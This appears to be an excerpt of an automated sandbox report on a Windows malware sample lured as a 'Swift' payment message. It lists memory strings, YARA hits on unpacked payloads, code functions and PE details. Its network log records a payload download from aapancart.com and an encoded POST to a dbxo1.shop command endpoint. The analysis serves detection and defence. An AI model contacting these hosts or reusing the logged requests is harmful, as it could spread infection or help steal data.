Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://www.mozilla.com0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar0
Source: 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8032929783.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com//
Source: 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8032929783.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com/v104
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 63 8b 30 60 8b 30 61 8b 31 11 8b 30 66 8b 30 67 ec 45 14 8b 30 65 8b 30 6c 8b 30 60 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`
Source: unknown DNS traffic detected: queries for: aapancart.com
Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405425

System Summary

barindex
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: Swift Mesaj#U0131#09971.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00404C62 1_2_00404C62
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00406ADD 1_2_00406ADD
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004072B4 1_2_004072B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B0FF3F 1_2_02B0FF3F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF39D5 1_2_02AF39D5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF06AF 1_2_02AF06AF
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B11EDB 1_2_02B11EDB
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6A22 1_2_02AF6A22
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0A0F 1_2_02AF0A0F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0A0C 1_2_02AF0A0C
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6E04 1_2_02AF6E04
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF2202 1_2_02AF2202
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0212 1_2_02AF0212
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF7A75 1_2_02AF7A75
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0A53 1_2_02AF0A53
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF4FB7 1_2_02AF4FB7
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF07B4 1_2_02AF07B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF03EB 1_2_02AF03EB
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFBBF9 1_2_02AFBBF9
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF8BF1 1_2_02AF8BF1
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF032A 1_2_02AF032A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6B3F 1_2_02AF6B3F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0372 1_2_02AF0372
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF074A 1_2_02AF074A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF00B6 1_2_02AF00B6
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFC4B4 1_2_02AFC4B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF688B 1_2_02AF688B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF048A 1_2_02AF048A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF8890 1_2_02AF8890
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF20F8 1_2_02AF20F8
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF08C2 1_2_02AF08C2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF04DD 1_2_02AF04DD
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF80D4 1_2_02AF80D4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF80D2 1_2_02AF80D2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF74D0 1_2_02AF74D0
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF042A 1_2_02AF042A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF700F 1_2_02AF700F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF000B 1_2_02AF000B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6C0B 1_2_02AF6C0B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0002 1_2_02AF0002
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6C7E 1_2_02AF6C7E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF087A 1_2_02AF087A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF8878 1_2_02AF8878
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF8C78 1_2_02AF8C78
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B1345E 1_2_02B1345E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B129AC 1_2_02B129AC
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF2187 1_2_02AF2187
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF8983 1_2_02AF8983
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B10181 1_2_02B10181
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF05EA 1_2_02AF05EA
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF89FA 1_2_02AF89FA
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF8DC6 1_2_02AF8DC6
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF05D2 1_2_02AF05D2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF892E 1_2_02AF892E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF692A 1_2_02AF692A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6927 1_2_02AF6927
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0122 1_2_02AF0122
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF0938 1_2_02AF0938
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF051F 1_2_02AF051F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF211E 1_2_02AF211E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B1210E 1_2_02B1210E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF757E 1_2_02AF757E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF2140 1_2_02AF2140
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 4_2_01684A99 4_2_01684A99
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B146D7 NtProtectVirtualMemory, 1_2_02B146D7
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B15868 NtResumeThread, 1_2_02B15868
Source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964990945.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015075705.000000001D464000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987008873.000000001DD28000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7972720642.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
